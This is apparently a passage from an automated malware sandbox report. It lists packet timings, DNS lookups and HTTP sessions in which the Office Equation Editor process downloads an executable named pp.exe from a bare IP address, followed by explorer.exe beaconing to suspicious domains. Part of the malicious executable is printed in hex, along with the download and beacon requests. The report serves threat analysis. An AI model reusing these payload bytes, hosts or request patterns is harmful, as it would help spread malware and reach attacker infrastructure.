                                                                                                                                                      Nov 20, 2020 20:04:34.949125051 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.949166059 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.949176073 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.949179888 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.949234962 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.949274063 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.949289083 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.949299097 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.949362993 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.949439049 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.949453115 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.949455976 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.949529886 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.949532986 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.949635029 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.949662924 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.949691057 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.949706078 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.949744940 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.949780941 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.949790001 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.949795961 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.949867010 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.949917078 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.949955940 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.949959040 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.949976921 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.949997902 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.950014114 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.950023890 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.950037003 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.950068951 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.950077057 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.950115919 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.950146914 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.950154066 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.950165033 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.950174093 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.950192928 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.950222015 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.950242043 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.950308084 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.950520039 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:35.054105043 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:35.054303885 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:35.469078064 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:06:00.081711054 CET4916680192.168.2.22162.0.232.118
                                                                                                                                                      Nov 20, 2020 20:06:00.253252029 CET8049166162.0.232.118192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:06:00.253341913 CET4916680192.168.2.22162.0.232.118
                                                                                                                                                      Nov 20, 2020 20:06:00.253843069 CET4916680192.168.2.22162.0.232.118
                                                                                                                                                      Nov 20, 2020 20:06:00.436134100 CET8049166162.0.232.118192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:06:00.436189890 CET8049166162.0.232.118192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:06:00.436230898 CET8049166162.0.232.118192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:06:00.436270952 CET8049166162.0.232.118192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:06:00.436325073 CET8049166162.0.232.118192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:06:00.436364889 CET8049166162.0.232.118192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:06:00.436414003 CET8049166162.0.232.118192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:06:00.436458111 CET8049166162.0.232.118192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:06:00.436533928 CET4916680192.168.2.22162.0.232.118
                                                                                                                                                      Nov 20, 2020 20:06:00.436593056 CET4916680192.168.2.22162.0.232.118
                                                                                                                                                      Nov 20, 2020 20:06:00.436749935 CET4916680192.168.2.22162.0.232.118
                                                                                                                                                      Nov 20, 2020 20:06:00.436938047 CET4916680192.168.2.22162.0.232.118
                                                                                                                                                      Nov 20, 2020 20:06:00.608424902 CET8049166162.0.232.118192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:06:20.804052114 CET4916780192.168.2.22146.148.194.209
                                                                                                                                                      Nov 20, 2020 20:06:20.968270063 CET8049167146.148.194.209192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:06:20.968513012 CET4916780192.168.2.22146.148.194.209
                                                                                                                                                      Nov 20, 2020 20:06:20.968894005 CET4916780192.168.2.22146.148.194.209
                                                                                                                                                      Nov 20, 2020 20:06:21.133110046 CET8049167146.148.194.209192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:06:21.133157969 CET8049167146.148.194.209192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:06:21.133188009 CET8049167146.148.194.209192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:06:21.133414030 CET4916780192.168.2.22146.148.194.209
                                                                                                                                                      Nov 20, 2020 20:06:21.133493900 CET4916780192.168.2.22146.148.194.209
                                                                                                                                                      Nov 20, 2020 20:06:21.142466068 CET8049167146.148.194.209192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:06:21.146563053 CET4916780192.168.2.22146.148.194.209
                                                                                                                                                      Nov 20, 2020 20:06:21.297625065 CET8049167146.148.194.209192.168.2.22

                                                                                                                                                      UDP Packets

                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                      Nov 20, 2020 20:06:00.028192997 CET5219753192.168.2.228.8.8.8
                                                                                                                                                      Nov 20, 2020 20:06:00.066521883 CET53521978.8.8.8192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:06:20.610979080 CET5309953192.168.2.228.8.8.8
                                                                                                                                                      Nov 20, 2020 20:06:20.801933050 CET53530998.8.8.8192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:06:54.392342091 CET5283853192.168.2.228.8.8.8
                                                                                                                                                      Nov 20, 2020 20:06:54.432351112 CET53528388.8.8.8192.168.2.22

                                                                                                                                                      DNS Queries

                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                      Nov 20, 2020 20:06:00.028192997 CET192.168.2.228.8.8.80x708cStandard query (0)www.auctionpros.clubA (IP address)IN (0x0001)
                                                                                                                                                      Nov 20, 2020 20:06:20.610979080 CET192.168.2.228.8.8.80xa14dStandard query (0)www.sgbanfang.comA (IP address)IN (0x0001)
                                                                                                                                                      Nov 20, 2020 20:06:54.392342091 CET192.168.2.228.8.8.80xccffStandard query (0)www.opalthemovie.comA (IP address)IN (0x0001)

                                                                                                                                                      DNS Answers

                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                      Nov 20, 2020 20:06:00.066521883 CET8.8.8.8192.168.2.220x708cNo error (0)www.auctionpros.clubauctionpros.clubCNAME (Canonical name)IN (0x0001)
                                                                                                                                                      Nov 20, 2020 20:06:00.066521883 CET8.8.8.8192.168.2.220x708cNo error (0)auctionpros.club162.0.232.118A (IP address)IN (0x0001)
                                                                                                                                                      Nov 20, 2020 20:06:20.801933050 CET8.8.8.8192.168.2.220xa14dNo error (0)www.sgbanfang.com146.148.194.209A (IP address)IN (0x0001)
                                                                                                                                                      Nov 20, 2020 20:06:54.432351112 CET8.8.8.8192.168.2.220xccffName error (3)www.opalthemovie.comnonenoneA (IP address)IN (0x0001)

                                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                                      • 103.207.38.170
                                                                                                                                                      • www.auctionpros.club
                                                                                                                                                      • www.sgbanfang.com

                                                                                                                                                      HTTP Packets

                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                      0192.168.2.2249165103.207.38.17080C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                      Nov 20, 2020 20:04:32.756769896 CET0OUTGET /pp.exe HTTP/1.1
                                                                                                                                                      Accept: */*
                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                      Host: 103.207.38.170
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Nov 20, 2020 20:04:32.975847960 CET1INHTTP/1.1 200 OK
                                                                                                                                                      Date: Fri, 20 Nov 2020 19:04:32 GMT
                                                                                                                                                      Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.7
                                                                                                                                                      Last-Modified: Thu, 19 Nov 2020 08:07:19 GMT
                                                                                                                                                      ETag: "ada00-5b471378e0ce7"
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      Content-Length: 711168
                                                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Content-Type: application/x-msdownload
                                                                                                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b3 27 b6 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 ba 0a 00 00 1e 00 00 00 00 00 00 6e d9 0a 00 00 20 00 00 00 e0 0a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 1c d9 0a 00 4f 00 00 00 00 e0 0a 00 20 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 b9 0a 00 00 20 00 00 00 ba 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 20 1a 00 00 00 e0 0a 00 00 1c 00 00 00 bc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0b 00 00 02 00 00 00 d8 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 d9 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 50 e8 08 00 cc f0 01 00 03 00 00 00 02 00 00 06 c8 cd 01 00 88 1a 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 02 00 01 00 00 00 01 00 00 11 2a 00 00 00 1b 30 04 00 1f 00 00 00 01 00 00 11 00 00 28 1e 00 00 0a 28 05 00 00 06 00 de 02 00 dc 00 28 0b 00 00 06 02 28 06 00 00 06 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 13 30 04 00 ad 00 00 00 01 00 00 11 00 02 16 28 1f 00 00 0a 20 b0 cb 8b 1b 20 39 39 48 0e 61 25 0a 1d 5e 45 07 00 00 00 d0 ff ff ff 41 00 00 00 12 00 00 00 74 00 00 00 02 00 00 00 5b 00 00 00 29 00 00 00 2b 72 00 06 20 6b 78 5c 52 5a 20 46 88 3c 91 61 2b c3 02 17 28 07 00 00 06 00 06 20 8d ca c1 ee 5a 20 4a a6 e5 72 61 2b ac 00 02 17 28 20 00 00 0a 00 06 20 79 ff 5a 07 5a 20 59 e0 ad 40 61 2b 94 02 16 28 21 00 00 0a 00 06 20 c0 ad 34 ae 5a 20 ab a0 33 85 61 38 7a ff ff ff 02 16 28 22 00 00 0a 06 20 e1 cb c2 91 5a 20 c8 13 e9 49 61 38 61 ff ff ff 2a 00 00 00 13 30 04 00 44 00 00 00 01 00 00 11 00 20 66 37 11 69 20 59 84 7e 07 61 25 0a 19 5e 45 03 00 00 00 21 00 00 00 02 00 00 00 e0 ff ff ff 2b 1f 02 28 0d 00 00 06 6f 16 00 00 06 28 23 00 00 0a 06 20 d3 ff 04 cb 5a 20 5d d5 9a 68 61 2b c4 00 2a 13 30 03 00 07 00 00 00 01 00 00 11 02 28 24 00 00 0a 2a 00 13 30 04 00 08 00 00 00 01 00 00 11 02 03 6f 25 00 00 0a 2a 13 30 04 00 08 00 00 00 01 00 00 11 02 03 28 26 00 00 0a 2a 13 30 03 00 09 00 00 00 01 00 00 11 00
                                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL'_Pn @ @O H.textt `.rsrc @@.reloc@BPHP0*0((((*0( 99Ha%^EAt[)+r kx\RZ F<a+( Z Jra+( yZZ Y@a+(! 4Z 3a8z(" Z Ia8a*0D f7i Y~a%^E!+(o(# Z ]ha+*0($*0o%*0(&*0
                                                                                                                                                      Nov 20, 2020 20:04:32.975930929 CET3INData Raw: 02 28 27 00 00 0a 00 2a 00 00 00 13 30 03 00 33 00 00 00 01 00 00 11 73 28 00 00 0a 80 01 00 00 04 73 29 00 00 0a 80 02 00 00 04 73 2a 00 00 0a 80 03 00 00 04 73 2b 00 00 0a 80 04 00 00 04 73 2c 00 00 0a 80 05 00 00 04 2a 00 13 30 03 00 52 00 00
                                                                                                                                                      Data Ascii: ('*03s(s)s*s+s,*0R M'Ka%^E++)~o- t]\Z a+ 'Z 2~a+*0R }! EB`ia%^E++)~o. BZ i9
                                                                                                                                                      Nov 20, 2020 20:04:32.976052046 CET4INData Raw: 00 54 00 00 00 08 00 00 11 00 20 08 b8 93 65 20 ae 3e e0 7c 61 25 0b 1a 5e 45 04 00 00 00 2d 00 00 00 1e 00 00 00 02 00 00 00 dc ff ff ff 2b 2b 02 03 28 33 00 00 06 28 34 00 00 06 0a 07 20 3b 50 44 fc 5a 20 09 6f 0c 37 61 2b c3 07 20 bc 2e 55 4e
                                                                                                                                                      Data Ascii: T e >|a%^E-++(3(4 ;PDZ o7a+ .UNZ M3Fa+*0N v qa.a%^E'+%(5 ~NZ H/a+ l_+Z yOta+*0? V ca%^E+((
                                                                                                                                                      Nov 20, 2020 20:04:32.976193905 CET6INData Raw: 30 04 00 8d 00 00 00 01 00 00 11 03 02 7b 0b 00 00 04 fe 01 2c 5b 20 e8 c2 b7 93 20 57 4e 2d 96 61 25 0a 1c 5e 45 06 00 00 00 15 00 00 00 46 00 00 00 2f 00 00 00 d4 ff ff ff 55 00 00 00 02 00 00 00 2b 53 02 02 7c 0b 00 00 04 28 0f 00 00 2b 20 fb
                                                                                                                                                      Data Ascii: 0{,[ WN-a%^EF/U+S|(+ +rqp(7z Z Za+- #;%+ 9%&+ k<Z 9:a+*0{,j v 2a%^EU>$+S mZ E2Da+|
                                                                                                                                                      Nov 20, 2020 20:04:32.976294041 CET7INData Raw: 3c 5a 20 9a 0d dc d0 61 2b c5 07 20 da a7 7b 97 5a 20 a9 34 9c ff 61 2b b6 06 2a 00 00 13 30 03 00 4e 00 00 00 0b 00 00 11 00 20 cb 02 21 81 20 84 0f 75 d4 61 25 0b 1a 5e 45 04 00 00 00 dc ff ff ff 27 00 00 00 18 00 00 00 02 00 00 00 2b 25 02 28
                                                                                                                                                      Data Ascii: <Z a+ {Z 4a+*0N ! ua%^E'+%(C \uZ 3a+ WZ da+*0 @a%^EJ5p\-+n, QT%+ UO%& D\Za+ SZ Ga+
                                                                                                                                                      Nov 20, 2020 20:04:32.976392984 CET8INData Raw: 4c 02 1b 8a 5a 20 bf de 07 80 61 2b a0 06 2a 13 30 04 00 08 00 00 00 01 00 00 11 02 03 28 47 00 00 0a 2a 13 30 03 00 07 00 00 00 01 00 00 11 02 6f 48 00 00 0a 2a 00 13 30 04 00 08 00 00 00 01 00 00 11 02 03 73 49 00 00 0a 2a 13 30 05 00 09 00 00
                                                                                                                                                      Data Ascii: LZ a+*0(G*0oH*0sI*0oJ*0UsS(Vt f^a s(ca%^E +(W(X YZZ ;a+*0(K*0 x= ]x#Ba
                                                                                                                                                      Nov 20, 2020 20:04:32.976560116 CET10INData Raw: 00 00 00 b8 00 00 00 1b 00 00 00 38 3e 01 00 00 02 16 7d 24 00 00 04 06 20 35 f6 68 bf 5a 20 68 f0 24 d7 61 2b a1 02 6f ae 00 00 06 16 28 bd 00 00 06 06 20 4d ac 3e 63 5a 20 27 60 e9 1d 61 2b 86 02 28 64 00 00 06 00 06 20 26 9b 42 61 5a 20 bb cd
                                                                                                                                                      Data Ascii: 8>}$ 5hZ h$a+o( M>cZ '`a+(d &BaZ ?a8m(e mq_Z *Da8U ^Z a8Bo( MMZ v!a8#o( #3Z ta8orp(}o( VpZ i
                                                                                                                                                      Nov 20, 2020 20:04:32.976597071 CET11INData Raw: ff 09 20 df dd 0e 2a 5a 20 a9 2f 3e 5a 61 38 17 fc ff ff 07 72 ba 01 00 70 16 28 c1 00 00 06 2c 08 20 4e d0 e5 05 25 2b 06 20 ba ba 56 10 25 26 38 f5 fb ff ff 09 20 dc e0 43 fc 5a 20 f7 31 f1 f1 61 38 e3 fb ff ff 09 20 f1 c1 24 ad 5a 20 ad 34 ea
                                                                                                                                                      Data Ascii: *Z />Za8rp(, N%+ V%&8 CZ 1a8 $Z 4a8 W48 wEZ a8 f?Z 1fa8 <6 t%+ z%& a|Za8}(M aZ {a8d W/Z ]tea8Rrp(, #NL%+ ,'
                                                                                                                                                      Nov 20, 2020 20:04:32.976613998 CET13INData Raw: 25 26 38 e9 f6 ff ff 08 20 d0 a0 0c 30 33 08 20 37 78 41 6b 25 2b 06 20 31 7c d1 6f 25 26 09 20 43 89 4c 97 5a 61 38 c5 f6 ff ff 07 72 d6 01 00 70 16 28 c1 00 00 06 2c 08 20 0c 26 80 6a 25 2b 06 20 58 c5 b2 75 25 26 38 a3 f6 ff ff 09 20 12 9b a4
                                                                                                                                                      Data Ascii: %&8 03 7xAk%+ 1|o%& CLZa8rp(, &j%+ Xu%&8 Z 'C@a8 ~Z a8rp(, `xN%+ "%&8] K8Rrp(, e=]%+ s_%&80 73 m4%+ 2%&8 ;8}M G
                                                                                                                                                      Nov 20, 2020 20:04:32.976634026 CET14INData Raw: 57 7b 47 61 38 20 fe ff ff 02 7b 17 00 00 04 28 c7 00 00 06 15 fe 01 16 fe 01 13 05 20 f7 16 d7 d4 38 03 fe ff ff 17 13 06 11 09 20 6e 62 8a 98 5a 20 95 c6 c7 21 61 38 ed fd ff ff 00 11 09 20 92 f8 84 e7 5a 20 10 ca 31 ad 61 38 d9 fd ff ff 00 02
                                                                                                                                                      Data Ascii: W{Ga8 {( 8 nbZ !a8 Z 1a8{ +Z #a8 pZ a8( TZ a8(} l0Z '}a8j60 %+ %& Za8G("TBZ(
                                                                                                                                                      Nov 20, 2020 20:04:33.195771933 CET16INData Raw: 06 1f 15 28 bd 00 00 06 00 11 08 20 04 bf ae 85 5a 20 64 12 49 96 61 38 1e fe ff ff 02 1b 7d 1a 00 00 04 11 08 20 10 e4 15 d2 5a 20 b3 4c fa b5 61 38 04 fe ff ff 00 11 08 20 87 4a d7 ee 5a 20 7b 5e ce f6 61 38 f0 fd ff ff 02 7b 1e 00 00 04 07 9a
                                                                                                                                                      Data Ascii: ( Z dIa8} Z La8 JZ {^a8{( Z ,a8o{!(( P8o{!( >6q8 +wR8 mZ &a8n}} M!jZ ==a8M .;B


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                      1192.168.2.2249166162.0.232.11880C:\Windows\explorer.exe
                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                      Nov 20, 2020 20:06:00.253843069 CET748OUTGET /glt/?7nU0ar=hWCSv9Zuwtl8NadmrOYz8tuCeFQ4j+1tRbDGtAkGbLuNRVgUfRWqhIxsika1FnwxqADVww==&CdL=M2Mpiri HTTP/1.1
                                                                                                                                                      Host: www.auctionpros.club
                                                                                                                                                      Connection: close
                                                                                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                      Data Ascii:
                                                                                                                                                      Nov 20, 2020 20:06:00.436134100 CET750INHTTP/1.1 404 Not Found
                                                                                                                                                      Date: Fri, 20 Nov 2020 19:06:00 GMT
                                                                                                                                                      Server: Apache
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                      Content-Type: text/html
                                                                                                                                                      Connection: close
                                                                                                                                                      Data Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 33 0d 0a 34 30 34 0d 0a 31 0d 0a 20 0d 0a 39 0d 0a 4e 6f 74 20 46 6f 75 6e 64 0d 0a 31 66 63 61 0d 0a 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61
                                                                                                                                                      Data Ascii: 111157<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>34041 9Not Found1fca</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .conta
